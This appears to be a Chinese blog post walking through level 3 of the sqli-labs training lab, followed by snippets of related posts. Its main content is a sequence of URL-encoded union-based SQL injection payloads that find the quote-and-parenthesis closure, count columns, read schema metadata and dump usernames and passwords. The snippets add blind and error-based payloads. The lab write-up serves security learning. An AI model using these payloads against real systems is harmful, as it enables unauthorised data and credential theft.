SQL注入之sqli-labs靶场第三关

原创 已于 2024-08-11 23:22:47 修改 · 830 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库

于 2024-08-11 23:21:28 首次发布

标题:SQL注入之sqli-labs靶场第三关

目录:
1.寻找注入点
2.进行字段猜解
3.信息收集
4.sql注入

总结:

1.寻找注入点


在这里插入图片描述

在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=1%27)%20and%201=2--+

通过尝试发现注入点,使用双引号和)闭合,进行and 1=1 and 1=2 进行尝试

2.进行字段猜解


在这里插入图片描述
在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=1%27)%20order%20by%204%20--+

使用order by 进行字段猜解,发现字段数为3

3.信息收集


使用union联合查询进行回显点查询
在这里插入图片描述
发现会显点2,3
进行信息收集:
在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,database(),user()%20--+

经过查询发现数据库名:security,用户为root
在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,2,version()%20--+

版本号为:5.7.26

4.sql注入


爆破表名
在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20--+

爆破字段名
在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%20--+

发现回显这么多字段名:Id,name,pass,flag,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,level,id,username,password,id,username
可能是由于数据库中有同名不同库得表导致得
所以对security.users表进行查询,
在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,2,(select%20group_concat(Id,name,pass,flag,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,level,id,username,password,id,username)%20from%20security.users)%20%20--+

通过报错内容对字段进行排查,筛选
在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,2,(select%20group_concat(Id,0x3A,username,0x3A,password)%20from%20security.users)%20%20--+

最终查询出表中内容

总结


1.主要考察闭合方式 ’ 和)
2.order by 猜解字段数
3.union 联合查询
4.对MySQL数据库的information_schema库中的schemata,tables,columns,表的熟悉

SQL注入sqli-labs第三关(less-3)
s_xcx_ah的博客
06-10 2585
sqli第三关简要步骤
SQL注入sqli-labs靶场通关(第十二关)
l258282的博客
12-07 415
免责声明:工具本身并无好坏,希望大家以遵守《网络安全法》相关法律为前提来使用该工具,支持研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,和本人及开发者无关。
sqli-labs靶场——第三关
weixin_57240513的博客
07-25 740
id=1和?id=2-1的页面不一样。
sqli-labs靶场第三关
gou1791241251的博客
12-19 1858
传入id=1查看回显 第一步:判断是数字型注入还是字符型注入 输入单引号页面异常,输入双引号页面正常显示。但是从回显的信息看来,它是由’)来进行闭合的,所以我们尝试输入’)进行闭合再输入–+注释掉后面的代码,结果显示页面正常显示。由此可推出参数是’)进行闭合的!此时可以输入and 1=1 和and 1=2来比较 此时证明了上述假设的闭合方式 现在我们可以用order by 来进行判断此表有多少个字段啦! order by 3正常 ; order by 4异常。说明有3个字段. 使用联合
SQLI-labs-第三关
weixin_54055099的博客
08-30 593
SQLI第三关的思路
【less-3sqli-labs靶场第三关
未名编程
07-19 486
网址 https://sqli.wmcoder.site/sqli-labs/Less-3/ 解法 与Less-2类似,直接看这篇文章:【less-2】sqli-labs靶场第二关 不同的是,根据错误回显知道,其拼接方式为id=('$id') 故采用https://sqli.wmcoder.site/sqli-labs/Less-2/?id=1') 采用如下语句获取所有用户名和密码 https://sqli.wmcoder.site/sqli-labs/Less-3/?id=1') and 1=2 unio
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
"Sqli-labs-maste"是一个专门设计用来练习和提高SQL注入技术的靶场环境,它提供了各种不同难度级别的SQL注入漏洞供用户尝试解决,从而帮助学习者深入理解SQL注入的原理和防御技术。 与此同时,"phpStudy"是一个流行...
网络安全专题----sql注入sqli-Labs 靶场保姆级教程
qq_41567696的博客
07-28 1660
SQLi-Labs是一款用于学习和练习SQL注入漏洞的开源应用程序。它提供了一系列的漏洞场景和练习环境,帮助用户了解和实践SQL注入漏洞的利用技术。SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入字段中注入恶意的SQL代码,从而绕过应用程序的身份验证、访问敏感数据、修改数据库内容等。通过使用SQLi-Labs,用户可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
搭建sqli-labs靶场的过程相对简单。首先,用户需要准备一个包含Apache、MySQL和PHP的环境,例如使用wampserver或phpstudy等工具进行快速搭建。然后,将下载的sqli-labs-php7.zip解压到网站的根目录下,例如...
sqli-labs-master之第三关
weixin_66387649的博客
02-28 667
sqli-labs-master第三关详解
sqli靶场学习记录-第三关
qq_50744304的博客
08-03 258
第三关和前面两关没有太大的区别,只是数据访问的方式不一样。
SQL注入靶场第三关
2401_88387979的博客
12-02 565
报错,闭合点为 ') ,初步猜测为字符型。
sqli-labs第三关
2402_82441920的博客
07-03 441
id=2'的时候看到页面报错信息。可推断sql语句是单引号字符型且有括号,所以我们需要闭合单引号且也要考虑括号。通过下面代码进行SQL注入
sqli-labs---第三关
2201_75556700的博客
05-22 734
6、查询users表中字段名(查看到了敏感字段id,username,password)id=1' (报错:''1'') LIMIT 0,1')id=1') order by 3 --+ (没有报错)3、使用联合查询查看回显位置(前面为错可以执行后面的)id=1') order by 4 --+ (报错)5、查询表名(一共爆出四张表,查看敏感表users)7、查看字段username和password的信息。4、查询数据库名(security)id=1'' 正常显示。1、判断什么类型注入
SQL注入sqli-labs靶场通关(第三关
l258282的博客
12-03 465
免责声明:工具本身并无好坏,希望大家以遵守《网络安全法》相关法律为前提来使用该工具,支持研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,和本人及开发者无关。
sql-labs靶场第二关测试报告
ccc_9wy的博客
10-03 1549
sql-labs靶场第二关的测试报告;手工注入sqlmap两种方法;靶场源代码分析;详细过程。
SQLI-LABS靶场第三关手工注入
x15wda33的博客
06-15 288
解答1:无法判定是否有sql注入漏洞渗透测试本身在于尝试,我们只能说具有什么漏洞的特征,根据猜测去尝试有没有,并加以证明。使用 ‘)方式可以闭合成功,这里显示列数不足,这是因为没有对应上表中的列,但可以判定闭合成功且可以使用联合查询。解答3::无法判定闭合条件是什么,除非可以看到源码,但渗透测试时几乎不会看到源码,这也是一个大胆假设小心求证的过程。这里我们不难看出当我们输入id=1,id=2时会出现类似界面的不同字段这时我们可以尝试以id作为注入点尝试注入。id=字段但是却sql注入不出来?
SQL注入sqli-labs靶场通关
最新发布
10-19
SQL注入是利用网站应用程序在构建数据库查询时的不当处理,攻击者插入恶意SQL代码片段,执行后可能泄露敏感信息、修改数据甚至控制服务器。对于sqli - labs靶场不同关卡,有不同的通关方法。 在sqli - labs靶场Less - 1(GET_非盲注)部分,这属于GET型非盲注情况。对于这种情况,通常可以利用构造恶意SQL语句来探测数据库信息。例如,通过在URL参数处构造类似 `id=1' OR 1=1 --+` 这样的语句,若页面显示异常或显示了不同的数据,就说明存在SQL注入漏洞。之后可以进一步构造语句获取数据库名、表名、字段名等信息,如 `id=-1' UNION SELECT 1, database(), 3 --+` 来获取当前数据库名 [^1]。 对于sqli - labs靶场Less - 5 ~ Less - 10(GET_盲注),由于是盲注情况,无法直接从页面获取完整的查询结果,需要通过构造条件判断语句,根据页面返回的不同状态来推断信息。例如可以使用 `id=1' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE())>0, SLEEP(5), 1) --+` 这样的语句,若页面响应延迟了5秒,就说明当前数据库存在表。通过不断构造类似的条件判断语句,逐步获取数据库的信息 [^2]。 在一些关卡还可以使用报错注入,如在某些情况下使用 `'and updatexml(1,concat(0x7e,(database()),0x7e),1) and '1'='1` 这样的语句,利用 `UPDATEXML` 函数的错误来输出数据库名等信息 [^3]。 ```sql -- 示例:获取数据库名 id=-1' UNION SELECT 1, database(), 3 --+ -- 示例:盲注判断是否存在表 id=1' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE())>0, SLEEP(5), 1) --+ -- 示例:报错注入获取数据库名 'and updatexml(1,concat(0x7e,(database()),0x7e),1) and '1'='1 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值